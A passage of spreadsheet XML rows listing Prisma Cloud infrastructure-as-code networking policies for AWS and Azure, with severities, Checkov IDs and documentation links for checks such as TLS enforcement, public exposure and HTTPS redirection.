      </c>
    </row>
    <row r="1347">
      <c r="A1347" t="inlineStr"/>
      <c r="B1347" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1347" s="2" t="inlineStr"/>
      <c r="D1347" t="inlineStr"/>
      <c r="E1347" t="inlineStr"/>
      <c r="F1347" t="inlineStr"/>
      <c r="G1347" t="b">
        <v>1</v>
      </c>
      <c r="H13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7" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1347" t="inlineStr">
        <is>
          <t>IaC:Networking:aws-ses</t>
        </is>
      </c>
      <c r="K1347" t="inlineStr">
        <is>
          <t>TLS not enforced in SES configuration set</t>
        </is>
      </c>
      <c r="L1347" t="inlineStr"/>
      <c r="M1347" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1347" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1347" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1347" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1347" t="inlineStr"/>
      <c r="R1347" t="inlineStr"/>
      <c r="S1347" t="inlineStr"/>
      <c r="T1347" t="b">
        <v>0</v>
      </c>
      <c r="U1347" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1347" t="inlineStr">
        <is>
          <t>IaC:Networking:aws-ses-configuration-set</t>
        </is>
      </c>
      <c r="W1347" t="inlineStr">
        <is>
          <t>Ensure SES Configuration Set enforces TLS usage</t>
        </is>
      </c>
      <c r="X1347" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-networking-policies/bc-aws-365</t>
        </is>
      </c>
      <c r="Y1347" t="inlineStr"/>
      <c r="Z1347" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["aws_ses_configuration_set"]}</t>
        </is>
      </c>
      <c r="AA1347" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1347" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1347" t="inlineStr">
        <is>
          <t>CKV_AWS_365</t>
        </is>
      </c>
      <c r="AD1347" t="b">
        <v>1</v>
      </c>
      <c r="AE1347" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1347" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG13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7" t="inlineStr">
        <is>
          <t>da19b3af-cfca-4e08-af38-07fca6e98ae6</t>
        </is>
      </c>
      <c r="AI1347" t="inlineStr"/>
      <c r="AJ1347" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1347" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1348">
      <c r="A1348" t="inlineStr"/>
      <c r="B1348" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1348" s="2" t="inlineStr"/>
      <c r="D1348" t="inlineStr"/>
      <c r="E1348" t="inlineStr"/>
      <c r="F1348" t="inlineStr"/>
      <c r="G1348" t="b">
        <v>1</v>
      </c>
      <c r="H13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8" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1348" t="inlineStr">
        <is>
          <t>IaC:Networking:aws-transfer</t>
        </is>
      </c>
      <c r="K1348" t="inlineStr">
        <is>
          <t>AWS Transfer Server is publicly exposed</t>
        </is>
      </c>
      <c r="L1348" t="inlineStr"/>
      <c r="M1348" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1348" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1348" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1348" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1348" t="inlineStr"/>
      <c r="R1348" t="inlineStr"/>
      <c r="S1348" t="inlineStr"/>
      <c r="T1348" t="b">
        <v>0</v>
      </c>
      <c r="U1348" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1348" t="inlineStr">
        <is>
          <t>IaC:Networking:aws-transfer-server</t>
        </is>
      </c>
      <c r="W1348" t="inlineStr">
        <is>
          <t>Ensure AWS Transfer Server is not exposed publicly</t>
        </is>
      </c>
      <c r="X1348" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-networking-policies/ensure-transfer-server-is-not-exposed-publicly</t>
        </is>
      </c>
      <c r="Y1348" t="inlineStr"/>
      <c r="Z1348" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["aws_transfer_server"]}</t>
        </is>
      </c>
      <c r="AA1348" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1348" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1348" t="inlineStr">
        <is>
          <t>CKV_AWS_164</t>
        </is>
      </c>
      <c r="AD1348" t="b">
        <v>1</v>
      </c>
      <c r="AE1348" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1348" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG13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8" t="inlineStr">
        <is>
          <t>3eec109c-2e42-4875-bdfe-04b2a9999a7b</t>
        </is>
      </c>
      <c r="AI1348" t="inlineStr"/>
      <c r="AJ1348" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1348" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1349">
      <c r="A1349" t="inlineStr"/>
      <c r="B1349" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1349" s="2" t="inlineStr"/>
      <c r="D1349" t="inlineStr"/>
      <c r="E1349" t="inlineStr"/>
      <c r="F1349" t="inlineStr"/>
      <c r="G1349" t="b">
        <v>1</v>
      </c>
      <c r="H13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49" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1349" t="inlineStr">
        <is>
          <t>IaC:Networking:aws-vpc</t>
        </is>
      </c>
      <c r="K1349" t="inlineStr">
        <is>
          <t>VPC endpoint service is not configured for manual acceptance</t>
        </is>
      </c>
      <c r="L1349" t="inlineStr"/>
      <c r="M1349" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1349" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1349" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1349" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1349" t="inlineStr"/>
      <c r="R1349" t="inlineStr"/>
      <c r="S1349" t="inlineStr"/>
      <c r="T1349" t="b">
        <v>0</v>
      </c>
      <c r="U1349" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1349" t="inlineStr">
        <is>
          <t>IaC:Networking:aws-vpc-endpoint-service</t>
        </is>
      </c>
      <c r="W1349" t="inlineStr">
        <is>
          <t>Ensure that VPC Endpoint Service is configured for Manual Acceptance</t>
        </is>
      </c>
      <c r="X1349" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-networking-policies/ensure-that-vpc-endpoint-service-is-configured-for-manual-acceptance</t>
        </is>
      </c>
      <c r="Y1349" t="inlineStr"/>
      <c r="Z1349" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["aws_vpc_endpoint_service"]}</t>
        </is>
      </c>
      <c r="AA1349" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1349" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1349" t="inlineStr">
        <is>
          <t>CKV_AWS_123</t>
        </is>
      </c>
      <c r="AD1349" t="b">
        <v>1</v>
      </c>
      <c r="AE1349" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1349" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG13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49" t="inlineStr">
        <is>
          <t>5eb67c68-44e9-49bb-b1bb-5f0a5511b124</t>
        </is>
      </c>
      <c r="AI1349" t="inlineStr"/>
      <c r="AJ1349" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1349" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1350">
      <c r="A1350" t="inlineStr"/>
      <c r="B1350" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1350" s="2" t="inlineStr"/>
      <c r="D1350" t="inlineStr"/>
      <c r="E1350" t="inlineStr"/>
      <c r="F1350" t="inlineStr"/>
      <c r="G1350" t="b">
        <v>1</v>
      </c>
      <c r="H13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0" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J1350" t="inlineStr">
        <is>
          <t>IaC:Networking:azure-api</t>
        </is>
      </c>
      <c r="K1350" t="inlineStr">
        <is>
          <t>API Management with Public Access</t>
        </is>
      </c>
      <c r="L1350" t="inlineStr"/>
      <c r="M1350" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1350" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1350" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1350" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1350" t="inlineStr"/>
      <c r="R1350" t="inlineStr"/>
      <c r="S1350" t="inlineStr"/>
      <c r="T1350" t="b">
        <v>0</v>
      </c>
      <c r="U1350" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1350" t="inlineStr">
        <is>
          <t>IaC:Networking:azure-api-management</t>
        </is>
      </c>
      <c r="W1350" t="inlineStr">
        <is>
          <t>Ensure API management public access is disabled</t>
        </is>
      </c>
      <c r="X1350" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.paloaltonetworks.com/prisma/prisma-cloud/prisma-cloud-code-security-policy-reference/azure-policies/azure-networking-policies/azr-networking-174</t>
        </is>
      </c>
      <c r="Y1350" t="inlineStr"/>
      <c r="Z1350" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["azurerm_api_management"]}</t>
        </is>
      </c>
      <c r="AA1350" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1350" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1350" t="inlineStr">
        <is>
          <t>CKV_AZURE_174</t>
        </is>
      </c>
      <c r="AD1350" t="b">
        <v>1</v>
      </c>
      <c r="AE1350" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1350" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG13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0" t="inlineStr">
        <is>
          <t>7fd8bcb9-abf7-4dd7-8a15-959cce948f72</t>
        </is>
      </c>
      <c r="AI1350" t="inlineStr"/>
      <c r="AJ1350" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1350" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1351">
      <c r="A1351" t="inlineStr"/>
      <c r="B1351" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1351" s="2" t="inlineStr"/>
      <c r="D1351" t="inlineStr"/>
      <c r="E1351" t="inlineStr"/>
      <c r="F1351" t="inlineStr"/>
      <c r="G1351" t="b">
        <v>1</v>
      </c>
      <c r="H13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1" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J1351" t="inlineStr">
        <is>
          <t>IaC:Networking:azure-api</t>
        </is>
      </c>
      <c r="K1351" t="inlineStr">
        <is>
          <t>API management services do not use virtual networks</t>
        </is>
      </c>
      <c r="L1351" t="inlineStr"/>
      <c r="M1351" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1351" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1351" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1351" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1351" t="inlineStr"/>
      <c r="R1351" t="inlineStr"/>
      <c r="S1351" t="inlineStr"/>
      <c r="T1351" t="b">
        <v>0</v>
      </c>
      <c r="U1351" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1351" t="inlineStr">
        <is>
          <t>IaC:Networking:azure-api-management</t>
        </is>
      </c>
      <c r="W1351" t="inlineStr">
        <is>
          <t>Ensure that API management services use virtual networks</t>
        </is>
      </c>
      <c r="X1351" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-networking-policies/ensure-that-api-management-services-uses-virtual-networks</t>
        </is>
      </c>
      <c r="Y1351" t="inlineStr"/>
      <c r="Z1351" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["azurerm_api_management"]}</t>
        </is>
      </c>
      <c r="AA1351" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1351" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1351" t="inlineStr">
        <is>
          <t>CKV_AZURE_107</t>
        </is>
      </c>
      <c r="AD1351" t="b">
        <v>1</v>
      </c>
      <c r="AE1351" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1351" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG13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1" t="inlineStr">
        <is>
          <t>2fe7b111-9608-48a5-8062-7878f8ca9c2e</t>
        </is>
      </c>
      <c r="AI1351" t="inlineStr"/>
      <c r="AJ1351" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1351" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1352">
      <c r="A1352" t="inlineStr"/>
      <c r="B1352" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1352" s="2" t="inlineStr"/>
      <c r="D1352" t="inlineStr"/>
      <c r="E1352" t="inlineStr"/>
      <c r="F1352" t="inlineStr"/>
      <c r="G1352" t="b">
        <v>1</v>
      </c>
      <c r="H13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2" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J1352" t="inlineStr">
        <is>
          <t>IaC:Networking:azure-app</t>
        </is>
      </c>
      <c r="K1352" t="inlineStr">
        <is>
          <t>App Configuration Public Access Enabled</t>
        </is>
      </c>
      <c r="L1352" t="inlineStr"/>
      <c r="M1352" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1352" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1352" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1352" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1352" t="inlineStr"/>
      <c r="R1352" t="inlineStr"/>
      <c r="S1352" t="inlineStr"/>
      <c r="T1352" t="b">
        <v>0</v>
      </c>
      <c r="U1352" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1352" t="inlineStr">
        <is>
          <t>IaC:Networking:azure-app-configuration</t>
        </is>
      </c>
      <c r="W1352" t="inlineStr">
        <is>
          <t>Ensure 'Public Access' is not Enabled for App configuration</t>
        </is>
      </c>
      <c r="X1352" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.paloaltonetworks.com/prisma/prisma-cloud/prisma-cloud-code-security-policy-reference/azure-policies/azure-networking-policies/azr-networking-185</t>
        </is>
      </c>
      <c r="Y1352" t="inlineStr"/>
      <c r="Z1352" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["azurerm_app_configuration"]}</t>
        </is>
      </c>
      <c r="AA1352" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1352" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1352" t="inlineStr">
        <is>
          <t>CKV_AZURE_185</t>
        </is>
      </c>
      <c r="AD1352" t="b">
        <v>1</v>
      </c>
      <c r="AE1352" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1352" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG13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2" t="inlineStr">
        <is>
          <t>610fe404-67a4-471f-92fd-c59421b5eb42</t>
        </is>
      </c>
      <c r="AI1352" t="inlineStr"/>
      <c r="AJ1352" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1352" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1353">
      <c r="A1353" t="inlineStr"/>
      <c r="B1353" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1353" s="2" t="inlineStr"/>
      <c r="D1353" t="inlineStr"/>
      <c r="E1353" t="inlineStr"/>
      <c r="F1353" t="inlineStr"/>
      <c r="G1353" t="b">
        <v>1</v>
      </c>
      <c r="H13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3" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J1353" t="inlineStr">
        <is>
          <t>IaC:Networking:azure-app</t>
        </is>
      </c>
      <c r="K1353" t="inlineStr">
        <is>
          <t>Azure App Service Health Check Missing</t>
        </is>
      </c>
      <c r="L1353" t="inlineStr"/>
      <c r="M1353" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1353" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1353" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1353" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1353" t="inlineStr"/>
      <c r="R1353" t="inlineStr"/>
      <c r="S1353" t="inlineStr"/>
      <c r="T1353" t="b">
        <v>0</v>
      </c>
      <c r="U1353" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1353" t="inlineStr">
        <is>
          <t>IaC:Networking:azure-app-service,azure-linux-web-app,azure-windows-web-app</t>
        </is>
      </c>
      <c r="W1353" t="inlineStr">
        <is>
          <t>Ensure that App Service configures health check</t>
        </is>
      </c>
      <c r="X1353" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.paloaltonetworks.com/prisma/prisma-cloud/prisma-cloud-code-security-policy-reference/azure-policies/azure-networking-policies/azr-networking-213</t>
        </is>
      </c>
      <c r="Y1353" t="inlineStr"/>
      <c r="Z1353" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["azurerm_app_service","azurerm_linux_web_app","azurerm_windows_web_app"]}</t>
        </is>
      </c>
      <c r="AA1353" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1353" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1353" t="inlineStr">
        <is>
          <t>CKV_AZURE_213</t>
        </is>
      </c>
      <c r="AD1353" t="b">
        <v>1</v>
      </c>
      <c r="AE1353" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1353" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG13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3" t="inlineStr">
        <is>
          <t>437b18b2-4818-4d7f-957d-cee49f109535</t>
        </is>
      </c>
      <c r="AI1353" t="inlineStr"/>
      <c r="AJ1353" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1353" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1354">
      <c r="A1354" t="inlineStr"/>
      <c r="B1354" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1354" s="2" t="inlineStr"/>
      <c r="D1354" t="inlineStr"/>
      <c r="E1354" t="inlineStr"/>
      <c r="F1354" t="inlineStr"/>
      <c r="G1354" t="b">
        <v>1</v>
      </c>
      <c r="H13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4" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J1354" t="inlineStr">
        <is>
          <t>IaC:Networking:azure-app</t>
        </is>
      </c>
      <c r="K1354" t="inlineStr">
        <is>
          <t>Azure App's service slot does not use the latest version of TLS encryption</t>
        </is>
      </c>
      <c r="L1354" t="inlineStr"/>
      <c r="M1354" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1354" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1354" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1354" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1354" t="inlineStr"/>
      <c r="R1354" t="inlineStr"/>
      <c r="S1354" t="inlineStr"/>
      <c r="T1354" t="b">
        <v>0</v>
      </c>
      <c r="U1354" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1354" t="inlineStr">
        <is>
          <t>IaC:Networking:azure-app-service-slot</t>
        </is>
      </c>
      <c r="W1354" t="inlineStr">
        <is>
          <t>Ensure the App service slot is using the latest version of TLS encryption</t>
        </is>
      </c>
      <c r="X1354" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-networking-policies/ensure-azure-apps-service-slot-uses-the-latest-version-of-tls-encryption</t>
        </is>
      </c>
      <c r="Y1354" t="inlineStr"/>
      <c r="Z1354" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["azurerm_app_service_slot"]}</t>
        </is>
      </c>
      <c r="AA1354" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1354" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1354" t="inlineStr">
        <is>
          <t>CKV_AZURE_154</t>
        </is>
      </c>
      <c r="AD1354" t="b">
        <v>1</v>
      </c>
      <c r="AE1354" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1354" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG13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4" t="inlineStr">
        <is>
          <t>9d64bfd7-afd2-44fa-bd86-7ecd76d3d82a</t>
        </is>
      </c>
      <c r="AI1354" t="inlineStr"/>
      <c r="AJ1354" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1354" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1355">
      <c r="A1355" t="inlineStr"/>
      <c r="B1355" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1355" s="2" t="inlineStr"/>
      <c r="D1355" t="inlineStr"/>
      <c r="E1355" t="inlineStr"/>
      <c r="F1355" t="inlineStr"/>
      <c r="G1355" t="b">
        <v>1</v>
      </c>
      <c r="H13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5" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J1355" t="inlineStr">
        <is>
          <t>IaC:Networking:azure-app</t>
        </is>
      </c>
      <c r="K1355" t="inlineStr">
        <is>
          <t>Azure App service slot does not have debugging disabled</t>
        </is>
      </c>
      <c r="L1355" t="inlineStr"/>
      <c r="M1355" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1355" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1355" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1355" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1355" t="inlineStr"/>
      <c r="R1355" t="inlineStr"/>
      <c r="S1355" t="inlineStr"/>
      <c r="T1355" t="b">
        <v>0</v>
      </c>
      <c r="U1355" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1355" t="inlineStr">
        <is>
          <t>IaC:Networking:azure-app-service-slot</t>
        </is>
      </c>
      <c r="W1355" t="inlineStr">
        <is>
          <t>Ensure debugging is disabled for the App service slot</t>
        </is>
      </c>
      <c r="X1355" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-networking-policies/ensure-azure-app-service-slot-has-debugging-disabled</t>
        </is>
      </c>
      <c r="Y1355" t="inlineStr"/>
      <c r="Z1355" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["azurerm_app_service_slot"]}</t>
        </is>
      </c>
      <c r="AA1355" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1355" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1355" t="inlineStr">
        <is>
          <t>CKV_AZURE_155</t>
        </is>
      </c>
      <c r="AD1355" t="b">
        <v>1</v>
      </c>
      <c r="AE1355" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1355" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG13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5" t="inlineStr">
        <is>
          <t>410f5fac-b595-48c4-9cd1-eefabcb99616</t>
        </is>
      </c>
      <c r="AI1355" t="inlineStr"/>
      <c r="AJ1355" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1355" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1356">
      <c r="A1356" t="inlineStr"/>
      <c r="B1356" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1356" s="2" t="inlineStr"/>
      <c r="D1356" t="inlineStr"/>
      <c r="E1356" t="inlineStr"/>
      <c r="F1356" t="inlineStr"/>
      <c r="G1356" t="b">
        <v>1</v>
      </c>
      <c r="H13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6" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J1356" t="inlineStr">
        <is>
          <t>IaC:Networking:azure-app</t>
        </is>
      </c>
      <c r="K1356" t="inlineStr">
        <is>
          <t>Azure web app does not redirect all HTTP traffic to HTTPS in Azure App Service Slot</t>
        </is>
      </c>
      <c r="L1356" t="inlineStr"/>
      <c r="M1356" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1356" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1356" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1356" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1356" t="inlineStr"/>
      <c r="R1356" t="inlineStr"/>
      <c r="S1356" t="inlineStr"/>
      <c r="T1356" t="b">
        <v>0</v>
      </c>
      <c r="U1356" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1356" t="inlineStr">
        <is>
          <t>IaC:Networking:azure-app-service-slot</t>
        </is>
      </c>
      <c r="W1356" t="inlineStr">
        <is>
          <t>Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service Slot</t>
        </is>
      </c>
      <c r="X1356" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-networking-policies/ensure-azure-web-app-redirects-all-http-traffic-to-https-in-azure-app-service-slot</t>
        </is>
      </c>
      <c r="Y1356" t="inlineStr"/>
      <c r="Z1356" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["azurerm_app_service_slot"]}</t>
        </is>
      </c>
      <c r="AA1356" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1356" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1356" t="inlineStr">
        <is>
          <t>CKV_AZURE_153</t>
        </is>
      </c>
      <c r="AD1356" t="b">
        <v>1</v>
      </c>
      <c r="AE1356" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1356" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG13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6" t="inlineStr">
        <is>
          <t>5f1492e8-2667-431e-b60a-6a0e6ec5c117</t>
        </is>
      </c>
      <c r="AI1356" t="inlineStr"/>
      <c r="AJ1356" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1356" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1357">
      <c r="A1357" t="inlineStr"/>
      <c r="B1357" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1357" s="2" t="inlineStr"/>
      <c r="D1357" t="inlineStr"/>
      <c r="E1357" t="inlineStr"/>
